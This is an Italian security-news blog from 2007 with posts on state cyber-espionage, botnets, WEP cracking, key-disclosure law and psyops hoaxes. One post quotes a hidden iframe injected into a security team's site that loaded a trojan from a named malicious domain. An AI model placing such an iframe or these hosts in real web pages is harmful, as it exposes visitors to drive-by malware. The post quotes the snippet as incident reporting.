giovedì 6 dicembre 2007

L' MI5 preoccuppato rigurdo al cyber-spionaggio Cinese

Da quanto afferma il Times ,il direttore generale dell'MI5 ha inviato personalmente delle mail di avvertimento destinate a piu di 300 responsabili di sicurezza delle banche inglesi.
L'avvertiento riguardava all'allarmismo di una crescente attività di spionaggio da parte di “Chinese state organisations”.

sabato 17 novembre 2007

Bloggers arabi contro Bloggers Americani....ancora non c'è storia.

From Wired.com:Quanto viene trapelato in questo articolo riguarda lo stato attuale delle guerre psyops nel mondo digitale tra gli americani e la popolazione araba.
E quando viene fatto notare è a dir poco scoraggiante: i "jihadists" stanno da tempo surclassando gli USA in quanto a guerra delle informazioni.
Sono perfettamente penetrati nell'intera rete di informazione quotidiana amercana sfruttando i più recenti mezzi mediatici usati dagli occidentali : quindi web ,social network, podcast..e per finire, Second Life.
Conoscono perfettamente l'inglese lo slang e qualsiasi abitudine occidentale ,tanto da farsi facilmente amalgamere con gli stessi.
Invece gli USA? Come si comporta La grandissima macchina psyops tanto ammirata e venduta?
La risposta ci viene data da MacInnes (State Department's "Digital Outreach Team") pilota del programa mirato a combattere il supporto ideologico a supporto del terrorismo.
The cultural sensitivity that this approach affords has been very successful, but it is labor-intensive. We are currently in the process of expanding the original team of two Arabic bloggers to six, while also adding one Urdu and two Farsi (Persian) linguists. The team does not engage hardcore militant sites, but concentrates on mainstream sites with heavy traffic that discuss U.S. policy, such as BBC Arabic, Al-Jazeera Talk, and Elaph On-Line News. We are also exploring how we can use the applicability to our mission of new cyber-technologies such as Second Life and cell phone games to further advance our mission.
[..]
The Arabic web site [the Americans spoofed one ndr] has the specific goal of countering violent extremism by offering a positive vision rooted in American values. It attracts more than 200,000 visitors per month
Bè la situazione è a dir poco imbarazzante ,già sapere che il team originale disposto a questo oneroso compito era di solo DUE persone la dice molto (anche se ora sono 6 non cambia molto la cosa).
Che poi stiano iniziando ad "esplorare" nuovi canali di informazione già maturi da anni e frequentati da milioni di utenze al giorno (come SecondLife) allora si che ci fa stare tranquilli ;)
Per finire ,il loro sito di contropropaganda riceve 200,000 visite al mese specialmente dai paesi sud orientali. ..calcolate che sul terrirorio iracheno stanziano circa 180.000 soldati americani ,in più aggiungete le ambasciate ecc ..secondo voi questa può essere una cifra di cui vantarsi?

giovedì 15 novembre 2007

Trojan Cinese su Hard Disk targati Maxtor

Chinese Trojan on Maxtor HDDs spooks Taiwan: Le autorità tailandesi hanno di recente scoperto che degli hard disk Maxtor provenienti dalla Cina siano stati infettati (direttamente dal rivenditore) tramite un trojan di nome AutoRun-AH il quale invierebbe remotamente (verso server cinesi) importanti informazioni riguardo al sistema che ospita l'hd in questione.

venerdì 9 novembre 2007

Al Qaeda annuncia una Cyber Jihad contro l'occidente

Al Qaeda declares Cyber Jihad on the West: Il 29 Ottobre passato ,dei seguaci di Osama bin Laden hanno annunciato l'arrivo di un' Electronic Jihad. Sabato 11 Novembre,gli esperti elettronici di al Qaeda inizieranno ad attaccare i siti web delle nazioni occidentali ,mussulmane ed israelitiche indistintamente. Il primo giorno attaccheranno 15 obiettivi già distinti ,andando così ad incrementare giorno dopo giorno la scala dell'attacco.

ndr: Chissà se è vero..staremo a vedere.

Kasperskys riguardo al cybercrime.

Kasperskys on cybercrime:: Eugene e Natalya Kaspersky ,i due fondatori dell'omonima casa di Anti-Virus hanno rilasciato un'interessante intervista rispondendo alle tematiche riguardo alla situazione del CyberCrime internazionale.
La domanda è semplice : Chi è che sta vincendo tra la continua lotta contro i Cybercriminali ?
Eugene K. afferma senza timore: loro.
Il cybercrime si sta sempre più diffondendo come un pericoloso strumento di potere ,utilizzabile per infiniti scopi. E come ogni arma ,è disponibile semplicemente a chi è disposto a spendere soldi.
I motivi sono svariati ,primo tra tutti è che si tratta di un crimine non ancora sufficentemente punito : negli ultimi 2 anni sono state arrestate poche centinaia di persone in tutto il mondo ,la maggior parte dei quali tutta gente di basso profilo informatico (script-kiddies per intenderci)
Il problema principale di questa grande carenza giuridica è che la maggior parte dei reati sono internazali coprendo così varie giurisdizioni ognuna della quali interpreta il reato informatico in maniera diversa.
E poi cè il problema di fondo : la rintracciabilità difficilissia dell'attaccante. Ogni attacco rimbalza su decine di server sparsi per il globo prima di raggiungere l'obbiettivo ,risalire alla fonte di tutto è un compito tendenzialmente impossibile.
Eugene K. stila anche una generica classifica riguardo alle principali nazioni presenti nel mondo del cyber crime: al primo posto vi è l'indubbia Cina ,protagonista ormai dei principali trojan multi-vector. A seguire le tutte le nazioni dove la lingua madre è lo spagnolo ed il Brasile ,principali autori del phishing bancario e frodi fiscali. A seguire Russia e Turchia che dengono il mercato dei proxy ,ovvero li dove ogni ricerca investigativa và a concludersi.

Sito dei Riformisti Iraniani violato

Iranian Reformist Website Hacked: Il sito dei Riformisti Iraniani è stato attaccato ,rendendolo inaccessibile per svariati giorni.

Perse le tracce di una nota hacker crew russa.

Computer World: La nota crew russa (The Russian Business Network (RBN) ) è all'improvviso sparita nell'oscurità :si pensa sia migrata in China.
Vari ricercatori (tra cui quelli di TrendMicro) hanno notato un'improvviso down dei recapiti digitali (come ad esempio IP ,instadamenti ecc) dovuta ad una migrazione verso nazioni dove la legge permette a loro una maggior "tutela" rispetto alla Russia ,hanno infatti notato attività RBN in Turchia ,Cina ,e Taiwan.
L'RBN è stato di recente protagonista delle principali vulnerabilità di Adobe Reader le quali permettevano l'esecuzione di codice arbitrario attraverso la semplice apertura di un file pdf ad-hoc.

martedì 23 ottobre 2007

WEP ,Il colpo di grazia

Techworld.com : Facendo carico delle falle di sicurezza nello stack wi-fi di Windows ,l'attacco si sviluppa bombardando di richieste ARP un utente isolato ,al fine di ottenere una replica di essi in modo da ricavarne la chiave WEP .
Se prima per ottenere la chiave bisognava sniffare il traffico tra AP e Client (ormai bastava un minuto di sniffing) ,adesso basta soffermarsi unicamente sul client.

lunedì 22 ottobre 2007

Hollywood disposta a tutto per fermare la pirateria.

Questo riepilogo non è disponibile. Fai clic qui per visualizzare il post.

venerdì 19 ottobre 2007

PI: Robot uccide 9 umani

PI: Robot uccide 9 umani:
"È accaduto in Sudafrica e, secondo le cronache locali, si è trattato di un cannone a 35mm con funzionalità anti-aeree che ha resistito ai tentativi di fermarlo svuotando i suoi 250 proiettili su un intero reparto militare."

mercoledì 10 ottobre 2007

Il governo USA all'attacco.

US leak alerts al-Qa’eda to website security flaw : Come riportato da questo articolo , Rita Katz (fondatrice del Washington-based SITE Intelligence Group) ha dichiarato recentemente che il governo americano riusciva ad ottenere i video di al-Qa'eda molto prima che questi fossero ceduti ufficialmente alla FOX dallo stesso gruppo terroristico. Come? Sfruttando una vulnerabilità presente in uno dei loro siti rimasta "unfixed" per circa un anno.
Altro esempio di come il governo americano si stia sempre più equipaggiando per un'offensiva(difensiva?) digitale.

sabato 6 ottobre 2007

Un pretesto di cyberwar

The Sietch Blog » Hackers: Unite For Burmese Freedom!: E' apparso qualche giorno fà un'appello su "The Sietch Blog" ,con un messaggio chiaro : Hackers di tutto il mondo riunitevi a supporto della Birmania.
Il sito prega la community dell'underground (in particolare chiunque sappia fare breccia in un firewall ((fortinet ?))o cose del genere) al fine di colpire i principali siti mediatici del gorverno birmano.
Ovviamente il fine è quello di postare foto ,immaggini ,o altro riguardanti le continue proteste soppresse in questi giorni (vedi esempio).
Questo per abbattere quel pesante muro rappresentato dalla forte censura applicata dal governo birmano durante questi giorni: nonostate qualche flash news non è facile reperire informazioni a riguardo lo svolgimento della protesta.

Un altro esempio di come la rete giochi un ruolo fondamentale anche per questioni geo/politiche.
Ci sarà da aspettarsi una an'altra WebWar (2.0) ?
Anche se questa volta sarebbe per un motivo valido ,non credo che possa accadere alla Birmania un qualcosa simile a quanto accaduto quest'estate all'Estonia :stavolta il fine non è politico ,bensì umanitario..quindi aimhè meno rilevante per molti.
Staremo a vedere.

giovedì 4 ottobre 2007

Dividet et Impera : ecco le nuove Botnets

Hackers Breaking Up Botnets To Elude Detection: Stando ad un gruppo di ricerca della Finjan condotto da Iftach Amit, le botnets odierne si stanno evolvendo in modo da evadere i sistemi di controllo al fine di mantenere il più possibile l'anonimità.
Le mastodontiche Botnet si stanno quindi dividendo in sotto gruppi di zombie molto più piccoli dei loro genitori,i vantaggi sono molteplici:
-Miglior gestibilità : Gestire una botnet da migliaia di zombie da un'unico punto di controllo è un'operazione al quanto difficile. Ridurre l'insieme di elementi da controllare garantisce sicuramente una migliore tattica di controllo
-Miglior affidabilità: Come per le policy di sicurezza IT, si preferisce avere meno Fault-Point possibili ,una botnet di dimensioni mastodontiche ma con pochi punti di controllo potrebbe essere ingestibile se quest'ultimi andassero persi.
-Minore la possibilità che le stesse vengano scoperte: una Sub-botnet genera molto meno traffico rispetto a quella paterna ,quindi è molto meno rintracciabile.

mercoledì 3 ottobre 2007

UK: O la chiave o la prigione

UK può ora domandare la chiave ai sospetti ,pena la galera: Ebbene si, stando a quanto afferma il Regulation of Investigatory Powers Act ,adesso gli investigatori possono ricattare i sospetti possessori di materiale crittografato con un semplice compromesso: O la chiave o la galera.
Per i casi più gravi ,come ad esempio per i sospettati di terrorismo ,la mancata collaborazione può aggravare la pena fino a 5 anni di galera.
E' un provvedimento che può sembrare sproporzionato alla colpa in se ,ma c'è anche da calcolare che la continua evoluzione e divulgazione di potenti algoritmi crittografici easy to use a costo 0 spesso e volentieri mettono un muro davanti agli sviluppi di un'indagine.
Certo ,il tutto sta nel criterio in cui una persona viene ientificata come "sospetto" : un tale potere da parte degli investigatori potrebbe essere facilmente abusato.

In un certo senso potrebbe rilevarsi anche una pena al quanto ridicola : se dentro quel disco cifrato ci fossero dati che vi aggiudicherebbero BEN più di soli 2,3 anni di galera ,voi la dareste la chiave? Ovvio che no.
L'esempio riportato da Ken Fisher calza a pennello :

"A pedophile with a 2GB collection of encrypted kiddie porn may find it easier to do two years in the slammer than expose what he's been up to."



Articolo pubblicato in inglese anche su fermath.info

CISRT Sotto un nuovo tipo di attacco

Sûnnet Beskerming - Chinese Internet Security Response Team Under Attack Il Chinese Internet Security Response ha recentemente subito un attacco di tipo Injection tramite IFRAME.
In alcune pagine del CISRT un'iframe del tipo :

<-iframe src="http://mms.nmmmn.com/%3Cremoved">.htm width=0 height=0 frameborder=0&amp;amp;gt;

Scaricava silenziosamente un trojan (sms.exe) il quale a sua volta ,una volta eseguito, scarivata altri 20 trojan dal dominio ganbibi.com.

Gli attacchi di tipo injection sono ormai noti ,ma questo presenta una piccola variante.
Si tratta di un tipo di attacco "itermittente" ,che aumenta la propria durata di vita mascherandosi attraverso delle pagine random. E' difficile risalire alle vere pagine maligne ,poichè si dovrebbero monitorare tutte le connessioni intermedie tra il visitatore ed il sito.

Come scrive il portale beskerming.com:

What is different in this case is that the hack is only being served to seemingly random site visitors.

This is actually quite an interesting method that can will extend the useful life of a hack by making it harder to isolate and investigate. With intermittent attacks on visitors it also means that investigators need to look at all of the intermediate connections between site visitors and the website. With multiple reports from different users it suggests that whatever is happening is not due to an infection on the systems belonging to site visitors.

Attention is currently being focussed on the possibility of an ARP spoofing / injection attack that is directing visitors to download malicious content from either nmmmn.com or ganbibi.com. To be successful against a broad sample of visitors, from a number of ISPs, such an attack would need to be launched and maintained from either the webhost / server hosting the CISRT website, or from a network chokepoint(s) that is common to most requests coming into the site.





Emerging Cyber Threats Report for 2008

Il Georgia Tech Information Security Center (GTISC) ha pubblicato un paper riguardo alle principali vulnerabilità che ci dovremmo attendere nel 2008.

Il documento tratta le seguenti tematiche:

Web 2.0 and client-side attacks
Targeted messaging attacks
Botnets
Threats targeting mobile convergence
Threats to Radio Frequency Identification (RFID) systems

Come si evince dai principali topic ,le aree "a rischio" sono proprio quelle in via di sviluppo : Web 2.0 ,VoIP ,ed RFID.

19/06/2007 Meteo da Praga...

Hackers smuggle mushroom cloud into CT's live broadcasting - Prague Daily Monitor.

Pochi giorni fà ,durante una trasmissione meteo che va in onda ogni mattina su tutto il territorio cecoslovacco (tipo il nostro UnoMattina) ,degli "hackers" hanno alterato un servizio meteo...in questo modo :

20/05/07 Un post da 4 milialrdi

Apple, 4 miliardi in fumo per un falso scoop -: Breve resoconto su un fatto che non fa che alimentare le mie perplessità/opinioni riguardo il nuovo mondo mediatico ed i nuovi mezzi di comunicazione.
Ieri un'importante blog finanziario di NY (l'Engadget)ha postato una news che informava tramite un comunicato stampa rilasciato da Apple riguardo all'inevitabile ritardo dei nuovi prodotti targati Apple (l'iPhone e il sistema operativo Leopard)
Cos'è successo?
Che ovviamente tutti gli azionisti della mela hanno immediatamente venduto le proprie azioni facendo cosi perdere nell'arco di pochi minuti ben QUATTRO MILIARDI di dollari.
La cosa bella era che la fonte da cui derivava quella notizia era pressoché falsa.
Il tempo che l'azienda di Cupertino se n'è accorta aveva già perso una grande fetta della sue azioni.


Vorrei un'attimo farvi riflettere su quanto oggi tutto sia condizionato dall'informazione.
Quest'entità infatti (l'informazione) è ormai divenuta la BASE di qualsiasi cosa: Economia ,Finanza ,Spionaggio ,Politica ecc.
E più si va avanti e più ognuno di noi è capace di *fare* informazione (ormai ognuno può aprire un blog ,un sito ecc ecc.) ,è fantastico dar voce ad ogni individuo nel mondo.
Sicuramente è stato il sogno di molti degli idealisti che ci hanno preceduto ..ma forse pochi di loro hanno mai pensato al COSA potrebbe accadere in un mondo di STRAinformazione.
Nei secoli prima infatti solo pochi scrivevano ,solo pochi narravano ,e quindi solo pochi "Informavano".
Tali informazioni avevano all'epoca un'alibi provato dall'insolita istruzione dell'autore che le produceva.
Oggi invece ognuno fa informazione ,ognuno è giornalista,critico,sociologo,opinionista.
Quest'anno il Times ha centrato esattamente il concetto della rivoluzione mediatica in cui siamo immersi eleggendo "Man of the year", YOU.
"TE" ,che fai informazione "TE" che fai girare l'economia "TE" che condizioni l'opinione pubblica "TE che fai girare il mondo come ti pare in poche parole.
Qualche esempio?
chi credete che ha reso famoso google?
Chi youtube?
Chi microsoft?
Bastano queste 2 "major" (Google e Microsoft) per far girare l'economia occidentale.

Già ce ne siamo resi ben conto un anno fa di cosa possono provocare degli innocui "fumetti" postati su un'angolo sperduto di internet.
Lì però la cosa è stata molto più grave, quell'informazione ha GENERATO rabbia ,attentati,morte.

Sorge una domanda quasi spontanea.
MERITIAMO tutto questo?
Siamo consapevoli di quanto sia sensibile questo potentissimo mezzo di comunicazione (internet? )
Sarà mai possibile controllare tutta questa marea di informazione?
Se si CHI è che avrà il diritto di farlo?

25/06/07 Harry Potter crakkato? Bufala made in USA. Esercitazione di un'operazione psyops.

PI: No, nessun crack ha violato Harry Potter: "'In meno di 48 ore - raccontano gli autori - una notizia fasulla è uscita su 200 quotidiani, 10mila blog, è stata oggetto di reportage televisivi dall'India all'America Latina'."

Ed ecco a voi ,un'altra prova di come dovreste spaventarvi di fronte alla POTENZA dei Media al giorno d'oggi.

C'è chi la usa a scopi economici (vedi mio articolo precedende su Apple) ,chi per scopi militari.
Stupiti ,queste sono pure e semplici operazioni psicologiche (in gergo PsyOps)
E questa è stata un capolavoro.
Degli esperti in questione infatti (specialisti psyops USA) hanno mostrato al mondo di come sia facile pilotare i media al giorno d'oggi.
Come?
Basta lavorare su un argomento popolare (quindi sensibile all'opinione pubblica) ,infilarci un pò di riferimenti religiosi ,qualche riferimento che fà "notizia" (come gli Hackers) ed archidettare un vero e proprio scoop.
L'articolo in questione è un vero e proprio capolavoro di operazione psicologica.
Un'inglese zoppicante che d'ha un'atmosfera creata ad hoc (magari quella di un'Hacker dell'est ,dal momento che recentemente i principali attacchi di cyberwarfare stanno avendo luogo li ) , un argomente MASS MEDIATICO (quanti libri ha venduto la saga di Harry Potter? Quanto hanno incassato i botteghini dei cinema con i suoi film? ) riferimenti RELIGIOSI (qualche sprazzo ,non troppo ) ed per finire un BUON CAVALLO DI TROIA ,cosa meglio di usare la figura di un Hacker per tutto questo?
Pensateci ,quanto vi piace questa figura? :)
Che siate esperti di informatica o non ,l'hacker di oggi affascina quanto lo faceva la figura di Arsenio Lupin .
E per finire ...IL MEZZO TRASMISSIVO : cosa migliore della principale mailing list degli esperti di sicurezza di tutto il mondo?
"Caspità se sta li dev'essere una cosa seria" ci saremmo detti in molti..

Il pacchetto è completo ,pronto da iniettare nella rete.

Ridirigo ancora una volta la vostra attenzione su questo :

In meno di 48 ore - raccontano gli autori - una notizia fasulla è uscita su 200 quotidiani, 10mila blog, è stata oggetto di reportage televisivi dall'India all'America Latina'."

Le operazione psyop
vengono condotte regolarmente e di continuo in tutto il Mondo, spesso con schemi assai più complessi: "Possiamo distinguere ciò che è vero da ciò che è manipolato? Sei consapevole che la guerra dell'informazione è una cosa reale e non solo un buon tema per il best seller di qualche scrittore?"